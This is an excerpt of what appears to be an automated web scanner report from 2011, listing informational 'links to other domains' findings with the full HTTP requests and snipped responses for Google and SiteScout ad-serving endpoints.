HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:33:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13341

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#003366;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/%26hl%3Den%26client%3Dca-pub-7382611274909550%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26adU%3Dwww.itt-tech.edu%26adT%3DITT%2BTech%2B-%2BOfficial%2BSite%26adU%3Dwww.SAS.com%26adT%3DNetwork%2BSecurity%26gl%3DUS&amp;usg=AFQjCNE862XoTqOxEomRscF5oa0sgep63w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.21. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7382611274909550&output=html&h=600&slotname=9883099109&w=160&lmt=1304328803&flash=10.2.154&url=http%3A%2F%2Fwww.newswiretoday.com%2Fnews%2F89806%2FThe_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management%2F&dt=1304310799175&bpp=109&shv=r20110427&jsv=r20110427&prev_slotnames=1249485879%2C1249485879&correlator=1304310800014&frm=0&adk=2054784108&ga_vid=829746307.1304310803&ga_sid=1304310803&ga_hid=1098320161&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=903&fu=0&ifi=3&dtd=3996&xpc=VHwV4gxzpf&p=http%3A//www.newswiretoday.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:33:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15740

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#003366;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/%26hl%3Den%26client%3Dca-pub-7382611274909550%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.StrategicThought.com%26adT%3DRisk%2BManagement%26adU%3Dwww.supplychainsecurity.com%26adT%3Dsecurity%2Brisk%2Bassessment%26adU%3Dwww.VillanovaU.com/Certificate%26adT%3DInfo%2BSystems%2BSecurity%26adU%3DSearch.Technology-Schools.com%26adT%3DNetwork%2BSecurity%2BOnline%26gl%3DUS&amp;usg=AFQjCNE9rUmSuRH1IVE0M6f9RpxV04GfpQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.22. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7382611274909550&output=html&h=90&slotname=1249485879&w=728&lmt=1304328803&flash=10.2.154&url=http%3A%2F%2Fwww.newswiretoday.com%2Fnews%2F89806%2FThe_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management%2F&dt=1304310798939&bpp=200&shv=r20110427&jsv=r20110427&prev_slotnames=1249485879&correlator=1304310800014&frm=0&adk=3092990179&ga_vid=829746307.1304310803&ga_sid=1304310803&ga_hid=1098320161&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=903&fu=0&ifi=2&dtd=4220&xpc=c3TFhSQ2wK&p=http%3A//www.newswiretoday.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:34:01 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13844

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#003366;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/%26hl%3Den%26client%3Dca-pub-7382611274909550%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26adU%3Dwww.VillanovaU.com/Certificate%26adT%3DInfo%2BSystems%2BSecurity%26gl%3DUS&amp;usg=AFQjCNFBvg-hMDLzBe_rei6aEXkw9b9p5w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.23. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304328302&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Fcdn%2Fexamples%2Fdork%2Fhttp-injection%2Fhttp-header-injection-dork-cwe-113-march-8-2011.html&dt=1304310301907&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304310302224&frm=0&adk=1607234649&ga_vid=1507467887.1304310302&ga_sid=1304310302&ga_hid=1320224918&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=887&fu=0&ifi=1&dtd=442&xpc=c6VTuxdnT3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:25:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7893

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFgABCF8UUUaSUwRiz6CISITWY9wQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.24. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:05:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4168

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</IFRAME>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=Tb4RXwAHNm8K5ovHrlhLb5hGYOYV9br2QoBlYA&creativeID=110455&message=eJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=9&exchange_id=4' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe>
...[SNIP]...
23.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3774305288881122&format=160x600_as&output=html&h=600&w=160&lmt=1304328825&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=2E58A6&color_text=000000&color_url=006699&flash=10.2.154&url=http%3A%2F%2Fwww.24-7pressrelease.com%2Fpress-release%2Fthe-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php&dt=1304310823336&bpp=32&shv=r20110427&jsv=r20110427&correlator=1304310825810&frm=0&adk=2292603500&ga_vid=1395234486.1304310827&ga_sid=1304310827&ga_hid=585375513&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=887&fu=0&ifi=1&dtd=4549&xpc=H13F5OeGt2&p=http%3A//www.24-7pressrelease.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:34:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15566

<!doctype html><html><head><style>a{color:#2e58a6}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php%26hl%3Den%26client%3Dca-pub-3774305288881122%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3Dwww.protegrity.com%26adT%3DSecure%2BSensitive%2BData%26adU%3Dwww.vocus.com%26adT%3DAutomate%2BYour%2BPR%26adU%3Dwww.PalisadeSystems.com%26adT%3DPrevent%2BData%2BLoss%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&amp;usg=AFQjCNG9HTIvHsdmEdGhLTjYRZW-JsJ-Rg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3774305288881122&format=336x280_as&output=html&h=280&w=336&lmt=1304328827&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=2E58A6&color_text=000000&color_url=006699&flash=10.2.154&url=http%3A%2F%2Fwww.24-7pressrelease.com%2Fpress-release%2Fthe-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php&dt=1304310823371&bpp=3&shv=r20110427&jsv=r20110427&prev_fmts=160x600_as&correlator=1304310825810&frm=0&adk=2642244470&ga_vid=1395234486.1304310827&ga_sid=1304310827&ga_hid=585375513&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=887&fu=0&ifi=2&dtd=7734&xpc=M0IEzlF3tX&p=http%3A//www.24-7pressrelease.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:35:05 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14292

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#2e58a6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php%26hl%3Den%26client%3Dca-pub-3774305288881122%26adU%3DBusinessWire.com/Press_Releases%26adT%3DSubmit%2Ba%2BPress%2BRelease%26adU%3Dvulnerability.scan.qualys.com%26adT%3DVulnerability%2BScan%26adU%3Dwww.NETGEAR.com/ProSecure%26adT%3DProSecure%2BBy%2BNETGEAR%25C2%25AE%26adU%3Dwww.IT-Colleges.edu/Criminology%26adT%3DSecurity%2BCertificates%26gl%3DUS&amp;usg=AFQjCNGt-F39jEO1blM4nKWr5jkAHbmN4w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.27. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4675364852109088&output=html&h=90&slotname=8870801362&w=728&lmt=1304337913&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912489&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362&correlator=1304319912561&frm=0&adk=314417003&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=2&dtd=2381&xpc=vncIdHcbbl&p=http%3A//www.greenhulk.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:05:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13907

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#5c9911;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_000000.gif" title="This site accepts Google Checkout" width=19> <span class=adb>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.greenhulk.net/forums/showthread.php%253F126285-Rear-boarding-step%26hl%3Den%26client%3Dca-pub-4675364852109088%26adU%3DEmpireCovers.com/BoatCovers%26adT%3DWaterproof%2BJet%2BSki%2BCovers%26adU%3Dwww.YamahaPartsHouse.com%26adT%3DYamaha%2BBike%2B%2526amp%253B%2BATV%2BParts%26adU%3DJustAnswer.com/Seadoo%26adT%3DAsk%2Ba%2BSeadoo%2BMechanic%26gl%3DUS&amp;usg=AFQjCNGcujFchWFVWmOhQoefMTd6selsOQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.28. http://guru.sitescout.com/disp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0%2F&rand=69005134 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 7838
Date: Mon, 02 May 2011 02:27:16 GMT
Connection: close


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0%2F', '_blank')">
<img src="http://guru.sitescout.netdna-cdn.com/oldlady_newskin-f472355.gif" alt="Dermatologists Hate Her!"/>
</td>
...[SNIP]...
